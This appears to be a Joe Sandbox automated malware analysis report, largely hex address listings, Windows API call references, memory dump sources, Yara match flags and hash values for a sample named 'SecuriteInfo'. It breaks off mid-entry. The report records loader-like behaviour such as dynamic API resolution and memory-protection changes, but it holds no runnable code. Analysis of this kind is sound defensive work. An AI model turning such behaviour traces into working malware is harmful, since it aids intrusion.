                                                                                                                          0x714620e4
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x714620bd
                                                                                                                          0x714620bd
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x7146210a
                                                                                                                          0x7146210e
                                                                                                                          0x71462113
                                                                                                                          0x71462116
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x714620c8
                                                                                                                          0x714620c8
                                                                                                                          0x714620cb
                                                                                                                          0x714620cd
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x714620dd
                                                                                                                          0x714620dd
                                                                                                                          0x714620e6
                                                                                                                          0x714620e6
                                                                                                                          0x71461fc5
                                                                                                                          0x71461fc5
                                                                                                                          0x71461fc8
                                                                                                                          0x71461fcf
                                                                                                                          0x71461fd1
                                                                                                                          0x71461fd3
                                                                                                                          0x71461fda
                                                                                                                          0x71461fdd
                                                                                                                          0x71461fe2
                                                                                                                          0x71461fe4
                                                                                                                          0x71461fe6
                                                                                                                          0x71461fea
                                                                                                                          0x71461ff0
                                                                                                                          0x71461ff6
                                                                                                                          0x71461ff6
                                                                                                                          0x71461ff8
                                                                                                                          0x71461ff8
                                                                                                                          0x71461ff9
                                                                                                                          0x71461ff9
                                                                                                                          0x71461ffd
                                                                                                                          0x71462003
                                                                                                                          0x71462005
                                                                                                                          0x71462009
                                                                                                                          0x7146200e
                                                                                                                          0x7146200e
                                                                                                                          0x71462010
                                                                                                                          0x71462010
                                                                                                                          0x71462013
                                                                                                                          0x71462016
                                                                                                                          0x7146201f
                                                                                                                          0x71462025
                                                                                                                          0x71462028
                                                                                                                          0x71462028
                                                                                                                          0x7146202a
                                                                                                                          0x7146202d
                                                                                                                          0x71462033
                                                                                                                          0x71462039
                                                                                                                          0x71462039
                                                                                                                          0x7146203b
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x71462041
                                                                                                                          0x71462041
                                                                                                                          0x71462045
                                                                                                                          0x7146204c
                                                                                                                          0x71462070
                                                                                                                          0x71462070
                                                                                                                          0x71462074
                                                                                                                          0x71462076
                                                                                                                          0x71462079
                                                                                                                          0x71462079
                                                                                                                          0x7146207c
                                                                                                                          0x7146207c
                                                                                                                          0x00000000
                                                                                                                          0x71462074
                                                                                                                          0x71462051
                                                                                                                          0x71462054
                                                                                                                          0x71462054
                                                                                                                          0x7146205b
                                                                                                                          0x7146205d
                                                                                                                          0x71462060
                                                                                                                          0x71462067
                                                                                                                          0x71462068
                                                                                                                          0x7146206e
                                                                                                                          0x7146206e
                                                                                                                          0x00000000
                                                                                                                          0x7146206e
                                                                                                                          0x71462062
                                                                                                                          0x71462065
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x71462065
                                                                                                                          0x71461ff2
                                                                                                                          0x71461ff4
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x71461f60
                                                                                                                          0x71461e05
                                                                                                                          0x71461e05
                                                                                                                          0x71461e06
                                                                                                                          0x71461f46
                                                                                                                          0x00000000
                                                                                                                          0x71461f46
                                                                                                                          0x71461e0c
                                                                                                                          0x71461e0d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x71461e13
                                                                                                                          0x71461e16
                                                                                                                          0x71461f0b
                                                                                                                          0x71461f0b
                                                                                                                          0x71461f0e
                                                                                                                          0x71461f23
                                                                                                                          0x71461f25
                                                                                                                          0x71461f25
                                                                                                                          0x71461f26
                                                                                                                          0x71461f29
                                                                                                                          0x71461f2c
                                                                                                                          0x71461f38
                                                                                                                          0x71461f38
                                                                                                                          0x71461f38
                                                                                                                          0x71461f2e
                                                                                                                          0x71461f2e
                                                                                                                          0x71461f2e
                                                                                                                          0x71461f3e
                                                                                                                          0x00000000
                                                                                                                          0x71461f3e
                                                                                                                          0x71461f10
                                                                                                                          0x71461f10
                                                                                                                          0x71461f11
                                                                                                                          0x71461f1f
                                                                                                                          0x00000000
                                                                                                                          0x71461f1f
                                                                                                                          0x71461f14
                                                                                                                          0x71461f15
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x71461f1b
                                                                                                                          0x00000000
                                                                                                                          0x71461f1b
                                                                                                                          0x71461e1c
                                                                                                                          0x71461f07
                                                                                                                          0x00000000
                                                                                                                          0x71461f07
                                                                                                                          0x71461e22
                                                                                                                          0x71461e22
                                                                                                                          0x71461e25
                                                                                                                          0x71461e4e
                                                                                                                          0x00000000
                                                                                                                          0x71461e4e
                                                                                                                          0x71461e27
                                                                                                                          0x71461e27
                                                                                                                          0x71461e2a
                                                                                                                          0x71461e44
                                                                                                                          0x00000000
                                                                                                                          0x71461e44
                                                                                                                          0x71461e2c
                                                                                                                          0x71461e2c
                                                                                                                          0x71461e2f
                                                                                                                          0x71461e3e
                                                                                                                          0x00000000
                                                                                                                          0x71461e3e
                                                                                                                          0x71461e32
                                                                                                                          0x71461e33
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x71461e35
                                                                                                                          0x00000000
                                                                                                                          0x71461cec
                                                                                                                          0x71461cec
                                                                                                                          0x71461cef
                                                                                                                          0x00000000
                                                                                                                          0x71461cef
                                                                                                                          0x71461ce6
                                                                                                                          0x71461cd3
                                                                                                                          0x71461cd8
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x71461cda
                                                                                                                          0x71461cdd
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x71461cdd
                                                                                                                          0x71461c6d
                                                                                                                          0x71461c70
                                                                                                                          0x71461ca6
                                                                                                                          0x71461ca9
                                                                                                                          0x00000000
                                                                                                                          0x71461caf
                                                                                                                          0x71461cb1
                                                                                                                          0x71461cb5
                                                                                                                          0x71461cbc
                                                                                                                          0x71461cc3
                                                                                                                          0x71461cc6
                                                                                                                          0x71461cc9
                                                                                                                          0x00000000
                                                                                                                          0x71461cc9
                                                                                                                          0x71461ca9
                                                                                                                          0x71461c72
                                                                                                                          0x71461c73
                                                                                                                          0x71461c8e
                                                                                                                          0x71461c91
                                                                                                                          0x00000000
                                                                                                                          0x71461c97
                                                                                                                          0x71461c97
                                                                                                                          0x71461c9e
                                                                                                                          0x71461ca1
                                                                                                                          0x00000000
                                                                                                                          0x71461ca1
                                                                                                                          0x71461c91
                                                                                                                          0x71461c78
                                                                                                                          0x00000000
                                                                                                                          0x71461c7e
                                                                                                                          0x71461c7e
                                                                                                                          0x71461c85
                                                                                                                          0x00000000
                                                                                                                          0x71461c85
                                                                                                                          0x71461c78
                                                                                                                          0x71461e74
                                                                                                                          0x71461e79
                                                                                                                          0x71461e7e
                                                                                                                          0x71461e82
                                                                                                                          0x71462355
                                                                                                                          0x7146235b
                                                                                                                          0x71461e94
                                                                                                                          0x71461e96
                                                                                                                          0x71461e97
                                                                                                                          0x7146227e
                                                                                                                          0x7146227e
                                                                                                                          0x71462281
                                                                                                                          0x71462284
                                                                                                                          0x714622a1
                                                                                                                          0x714622a7
                                                                                                                          0x714622a9
                                                                                                                          0x714622af
                                                                                                                          0x714622c6
                                                                                                                          0x714622c6
                                                                                                                          0x714622c6
                                                                                                                          0x714622d3
                                                                                                                          0x714622d9
                                                                                                                          0x714622dc
                                                                                                                          0x714622e2
                                                                                                                          0x714622e4
                                                                                                                          0x714622e8
                                                                                                                          0x714622ea
                                                                                                                          0x714622f1
                                                                                                                          0x714622f6
                                                                                                                          0x714622f9
                                                                                                                          0x714622fb
                                                                                                                          0x71462300
                                                                                                                          0x71462312
                                                                                                                          0x71462312
                                                                                                                          0x71462300
                                                                                                                          0x714622f9
                                                                                                                          0x714622e8
                                                                                                                          0x71462318
                                                                                                                          0x7146231b
                                                                                                                          0x71462325
                                                                                                                          0x7146232d
                                                                                                                          0x7146233a
                                                                                                                          0x71462340
                                                                                                                          0x71462343
                                                                                                                          0x71462273
                                                                                                                          0x71462273
                                                                                                                          0x00000000
                                                                                                                          0x71462273
                                                                                                                          0x71462349
                                                                                                                          0x7146234f
                                                                                                                          0x7146234f
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x71462351
                                                                                                                          0x71462351
                                                                                                                          0x71462351
                                                                                                                          0x71462351
                                                                                                                          0x00000000
                                                                                                                          0x7146231d
                                                                                                                          0x7146231d
                                                                                                                          0x71462323
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x71462323
                                                                                                                          0x7146231b
                                                                                                                          0x714622b2
                                                                                                                          0x714622b8
                                                                                                                          0x714622ba
                                                                                                                          0x714622c0
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x714622c0
                                                                                                                          0x71462286
                                                                                                                          0x7146228d
                                                                                                                          0x71462293
                                                                                                                          0x71462299
                                                                                                                          0x00000000
                                                                                                                          0x71462299
                                                                                                                          0x71461e9d
                                                                                                                          0x71461e9e
                                                                                                                          0x7146225d
                                                                                                                          0x7146225d
                                                                                                                          0x71462263
                                                                                                                          0x71462266
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x7146226d
                                                                                                                          0x71462272
                                                                                                                          0x00000000
                                                                                                                          0x71462272
                                                                                                                          0x71461ea5
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x71461eab
                                                                                                                          0x71461eab
                                                                                                                          0x71461eb4
                                                                                                                          0x71461eb9
                                                                                                                          0x71461ebf
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x71461ec5
                                                                                                                          0x71461ed2
                                                                                                                          0x71461ed8
                                                                                                                          0x71461ee2
                                                                                                                          0x71461ee8
                                                                                                                          0x71461ef0
                                                                                                                          0x71461f00
                                                                                                                          0x00000000
                                                                                                                          0x71461f00

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 714612BB: GlobalAlloc.KERNEL32(00000040,?,714612DB,?,7146137F,00000019,714611CA,-000000A0), ref: 714612C5
                                                                                                                          • GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 71461D2D
                                                                                                                          • lstrcpyW.KERNEL32(00000008,?), ref: 71461D75
                                                                                                                          • lstrcpyW.KERNEL32(00000808,?), ref: 71461D7F
                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 71461D92
                                                                                                                          • GlobalFree.KERNEL32(?), ref: 71461E74
                                                                                                                          • GlobalFree.KERNEL32(?), ref: 71461E79
                                                                                                                          • GlobalFree.KERNEL32(?), ref: 71461E7E
                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 71462068
                                                                                                                          • lstrcpyW.KERNEL32(?,?), ref: 71462222
                                                                                                                          • GetModuleHandleW.KERNEL32(00000008), ref: 714622A1
                                                                                                                          • LoadLibraryW.KERNEL32(00000008), ref: 714622B2
                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 7146230C
                                                                                                                          • lstrlenW.KERNEL32(00000808), ref: 71462326
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33069504467.0000000071461000.00000020.00000001.01000000.00000005.sdmp, Offset: 71460000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.33069452109.0000000071460000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33069570468.0000000071464000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33069617155.0000000071466000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_71460000_SecuriteInfo.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 245916457-0
                                                                                                                          • Opcode ID: 28f19992b3f52d51de446ad98ec6a4dfe0d2f38a6967df916dc6b8e9b56177a2
                                                                                                                          • Instruction ID: afdad6fe2174a1247fe10dd9f1a8147878d87edc3de2043070340ac03b46691e
                                                                                                                          • Opcode Fuzzy Hash: 28f19992b3f52d51de446ad98ec6a4dfe0d2f38a6967df916dc6b8e9b56177a2
                                                                                                                          • Instruction Fuzzy Hash: E522BEB1D04206EFDB12CFA4C980AEEBBB9FB44B1DF10452ED157E6284D7709A86CB51
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33053967361.0000000003490000.00000040.00001000.00020000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_3490000_SecuriteInfo.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: )Ke$;%e_$@&L]$R^V ${yI$5EZ$TP
                                                                                                                          • API String ID: 0-2346192787
                                                                                                                          • Opcode ID: dc4aec2e2c6143dd700aea29c36d6bcb9679914a3ee31822db690ba93b766961
                                                                                                                          • Instruction ID: 0f49f673c85a7814690732a6bdc15da08f2d02c19f2990c41f864bc58b74310d
                                                                                                                          • Opcode Fuzzy Hash: dc4aec2e2c6143dd700aea29c36d6bcb9679914a3ee31822db690ba93b766961
                                                                                                                          • Instruction Fuzzy Hash: 68A169631BCD681EF10CDB3C9CCAABA229BF7965253A6C01FD087C7157F879A8870165
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33053967361.0000000003490000.00000040.00001000.00020000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_3490000_SecuriteInfo.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 0H~$U!'L$}DI<
                                                                                                                          • API String ID: 0-1793131919
                                                                                                                          • Opcode ID: d237f52de908b8d5a92d8873bd9bb2f0914c048235c5885a9426d5e9f7afb31c
                                                                                                                          • Instruction ID: f5691baaa82488bbe2d025463d3d54ee41c8ad6ae15d1b917dd7fb5fd508ee6f
                                                                                                                          • Opcode Fuzzy Hash: d237f52de908b8d5a92d8873bd9bb2f0914c048235c5885a9426d5e9f7afb31c
                                                                                                                          • Instruction Fuzzy Hash: 54812475A08789DFDB309E38C9547DF77B6BFA9350F86042EDC899B200C3304A468B46
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33053967361.0000000003490000.00000040.00001000.00020000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_3490000_SecuriteInfo.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 0H~$U!'L$}DI<
                                                                                                                          • API String ID: 0-1793131919
                                                                                                                          • Opcode ID: 40f31a808682379ff160eb4c58d0201a087502068aa00b1520545d8e88e8bd8d
                                                                                                                          • Instruction ID: 42624ec04ffd72ad6064624139d572a2b0e40fb9d1c63723b528f9b4e5281a4a
                                                                                                                          • Opcode Fuzzy Hash: 40f31a808682379ff160eb4c58d0201a087502068aa00b1520545d8e88e8bd8d
                                                                                                                          • Instruction Fuzzy Hash: 87812675608789DFDB309E38C9547DF77B6BFA9350F85442EDC899B200D3305A468B45
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33053967361.0000000003490000.00000040.00001000.00020000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_3490000_SecuriteInfo.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 0H~$U!'L$}DI<
                                                                                                                          • API String ID: 0-1793131919
                                                                                                                          • Opcode ID: 6708585447598c1fa0b7023bdc0cf670d35063025f7a6eeb3964cf0a9ea8c99d
                                                                                                                          • Instruction ID: daa206629f168c32a45854d4855ab28f1adf9ee62a4cfe188abe9b44d43e8fb5
                                                                                                                          • Opcode Fuzzy Hash: 6708585447598c1fa0b7023bdc0cf670d35063025f7a6eeb3964cf0a9ea8c99d
                                                                                                                          • Instruction Fuzzy Hash: 308113756087899FDB309E38C9547DF77B6BFA9350F85042EDC89AB210D3304A868B46
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33053967361.0000000003490000.00000040.00001000.00020000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_3490000_SecuriteInfo.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 0H~$U!'L$}DI<
                                                                                                                          • API String ID: 0-1793131919
                                                                                                                          • Opcode ID: dbb3c7e80a016c75061647379f1a3d8664f68c8a8a2faeb7683d01b5bae14828
                                                                                                                          • Instruction ID: 5e39c94e150b0257025a15dbc9805b2511a3f448a72b5890dccc370bc9c3fdd7
                                                                                                                          • Opcode Fuzzy Hash: dbb3c7e80a016c75061647379f1a3d8664f68c8a8a2faeb7683d01b5bae14828
                                                                                                                          • Instruction Fuzzy Hash: 53812275608389DFDB309E38C9547DF77B6AFA9350F86442EDC89AB200D3305A868B46
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33053967361.0000000003490000.00000040.00001000.00020000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_3490000_SecuriteInfo.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 0H~$U!'L$}DI<
                                                                                                                          • API String ID: 0-1793131919
                                                                                                                          • Opcode ID: 39eb1c61d50581cdea37383926a0c5f8ca497afdb9135d3d4575903ed981f3e9
                                                                                                                          • Instruction ID: 36d5e6c33f85add06207e61b502ab3acc2bd82ac41bb37cb3c063abdc44000c4
                                                                                                                          • Opcode Fuzzy Hash: 39eb1c61d50581cdea37383926a0c5f8ca497afdb9135d3d4575903ed981f3e9
                                                                                                                          • Instruction Fuzzy Hash: 17812376608789DFDB309E38C9547DF77B6BFA9350F86442EDC899B200D3305A868B46
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33053967361.0000000003490000.00000040.00001000.00020000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_3490000_SecuriteInfo.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 0H~$U!'L$}DI<
                                                                                                                          • API String ID: 0-1793131919
                                                                                                                          • Opcode ID: 80b5721d0d73a60b4bfa9a761bd5cb54cea7fffd0c132b566451fd4bbe231f84
                                                                                                                          • Instruction ID: a59e0494ba8a7dc7f77011cdf45d5f7b656299eee11b54ab769423434ece472d
                                                                                                                          • Opcode Fuzzy Hash: 80b5721d0d73a60b4bfa9a761bd5cb54cea7fffd0c132b566451fd4bbe231f84
                                                                                                                          • Instruction Fuzzy Hash: 7F812475608389DFDB309E38C9557DF77B6BFA9350F86442EDC899B200D3305A868B46
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33053967361.0000000003490000.00000040.00001000.00020000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_3490000_SecuriteInfo.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: MemoryProtectVirtual
                                                                                                                          • String ID: OO/g$Z}p
                                                                                                                          • API String ID: 2706961497-3095447328
                                                                                                                          • Opcode ID: 9ac23d43a983b80329f9dfdb8e39acb8b7fd3be694a9cc62627a3f5d0c87f6a0
                                                                                                                          • Instruction ID: d2e6741cecddf6ec8b88f1cb70b95eda8234834bf648a171ba00f7e25846b3cf
                                                                                                                          • Opcode Fuzzy Hash: 9ac23d43a983b80329f9dfdb8e39acb8b7fd3be694a9cc62627a3f5d0c87f6a0
                                                                                                                          • Instruction Fuzzy Hash: C6421B355087868FDF31DF38C8987DB7BA2AF12350F89819ACCA58F296D3358586C716
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33053967361.0000000003490000.00000040.00001000.00020000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_3490000_SecuriteInfo.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: C_fB$^edT
                                                                                                                          • API String ID: 0-469687150
                                                                                                                          • Opcode ID: 3786777cfefa778b2fba4a8e01d94a2dee2858fa609983cabeaa44ca30eeda78
                                                                                                                          • Instruction ID: 0a0a71b8a8e5086390142224a85b8b9f875a922c4c9eabadc8f24cf176f5030a
                                                                                                                          • Opcode Fuzzy Hash: 3786777cfefa778b2fba4a8e01d94a2dee2858fa609983cabeaa44ca30eeda78
                                                                                                                          • Instruction Fuzzy Hash: 10E1977207CB690FE71CDF7898DA47A7789FA92126360D3AFD4C3CA597F522A8430065
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33053967361.0000000003490000.00000040.00001000.00020000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_3490000_SecuriteInfo.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: @$h
                                                                                                                          • API String ID: 0-772325506
                                                                                                                          • Opcode ID: 46ac07ffecdecb44fc7c876e9c4ac4d0254af6c9e1090e7428c359237850fee0
                                                                                                                          • Instruction ID: e0573c0ba668cc0ff09d9962fdd9c722e74a2318ca6027c0b420016d2bdddf96
                                                                                                                          • Opcode Fuzzy Hash: 46ac07ffecdecb44fc7c876e9c4ac4d0254af6c9e1090e7428c359237850fee0
                                                                                                                          • Instruction Fuzzy Hash: A4719A51E5E305C8FF63E0318AC13F12EA5DF67185F51876788776D8AAB21A0E4B058D
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33053967361.0000000003490000.00000040.00001000.00020000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_3490000_SecuriteInfo.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: @$h
                                                                                                                          • API String ID: 0-772325506
                                                                                                                          • Opcode ID: 59f57fa66399414c133a445915e51fdba5d680b691cf8d0d9ce42ecfc813bcf4
                                                                                                                          • Instruction ID: fa32a4b736fb5fa1144073aaf443d75aa8f8d92782f48e647cbd5bf4c99da01c
                                                                                                                          • Opcode Fuzzy Hash: 59f57fa66399414c133a445915e51fdba5d680b691cf8d0d9ce42ecfc813bcf4
                                                                                                                          • Instruction Fuzzy Hash: 2B510061E0D305DAFF16E43489823F62EA2EF572C1F5047678C775E4A5E32A0D8B094D
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33053967361.0000000003490000.00000040.00001000.00020000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_3490000_SecuriteInfo.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 0H~$U!'L
                                                                                                                          • API String ID: 0-14782489
                                                                                                                          • Opcode ID: 62fae03c4ebce1a23dbc4aa0edd45acae9ca20b181ddccd6cdabfa72fc8f342e
                                                                                                                          • Instruction ID: a8f6cacbc208da2331ee47fa009b28e2b41fc735ea34e512e789e0f127e1655c
                                                                                                                          • Opcode Fuzzy Hash: 62fae03c4ebce1a23dbc4aa0edd45acae9ca20b181ddccd6cdabfa72fc8f342e
                                                                                                                          • Instruction Fuzzy Hash: 7D711075A087999FDB30DE398D647DF37B2BFA9750F85452EDC98AB200C3309A428B45
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33053967361.0000000003490000.00000040.00001000.00020000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_3490000_SecuriteInfo.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 0H~$U!'L
                                                                                                                          • API String ID: 0-14782489
                                                                                                                          • Opcode ID: f099aa903362fe8b7c945efbd2c15726508fb5476481b94654b0e0c39c2c2b47
                                                                                                                          • Instruction ID: 46bdb5f5de3eecf9ddc30d3f89be77ef71a01f88e88725403a4b9f1de59e7e43
                                                                                                                          • Opcode Fuzzy Hash: f099aa903362fe8b7c945efbd2c15726508fb5476481b94654b0e0c39c2c2b47
                                                                                                                          • Instruction Fuzzy Hash: 9E711175A087999FDB30DE3989547DF37B2BFA9350F85442EDC8DAB200C3309A429B85
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33053967361.0000000003490000.00000040.00001000.00020000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_3490000_SecuriteInfo.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 0H~$U!'L
                                                                                                                          • API String ID: 0-14782489
                                                                                                                          • Opcode ID: 49cd13db9c96d170221ff2f4e4cad664314032190a473ffcdb538e2921f7e280
                                                                                                                          • Instruction ID: 19a3cca3d89c16db6d7b21828382e707794e5d86d4016c7560cfebb68403ae23
                                                                                                                          • Opcode Fuzzy Hash: 49cd13db9c96d170221ff2f4e4cad664314032190a473ffcdb538e2921f7e280
                                                                                                                          • Instruction Fuzzy Hash: 8F711175A087999BDB30DE3989547DF37B6BFA9350F85442EDC89AB200C3309A428B45
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33053967361.0000000003490000.00000040.00001000.00020000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_3490000_SecuriteInfo.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 0H~$U!'L
                                                                                                                          • API String ID: 0-14782489
                                                                                                                          • Opcode ID: af03e279d0beb896df199e6ec1074262176daa173b051e92113ffa4f7da2a8a6
                                                                                                                          • Instruction ID: f4d7c3d697b72b95ec6931b2417c82b6d95256cec827a413d59cb70a80e60b60
                                                                                                                          • Opcode Fuzzy Hash: af03e279d0beb896df199e6ec1074262176daa173b051e92113ffa4f7da2a8a6
                                                                                                                          • Instruction Fuzzy Hash: AA711175A087899FDB30DE398D647DF37B2BFA9350F85452EDC989B200C3309A468B45
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33053967361.0000000003490000.00000040.00001000.00020000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_3490000_SecuriteInfo.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 0H~$U!'L
                                                                                                                          • API String ID: 0-14782489
                                                                                                                          • Opcode ID: b8cfa05f27f7292453aaf3bc4284cdf8c35f91219afb44ad038f9ea9f7fe4940
                                                                                                                          • Instruction ID: 6840f0b3cc3e136ae5ee586fb7ab77309df11d2f0429ae526281e5373128ae63
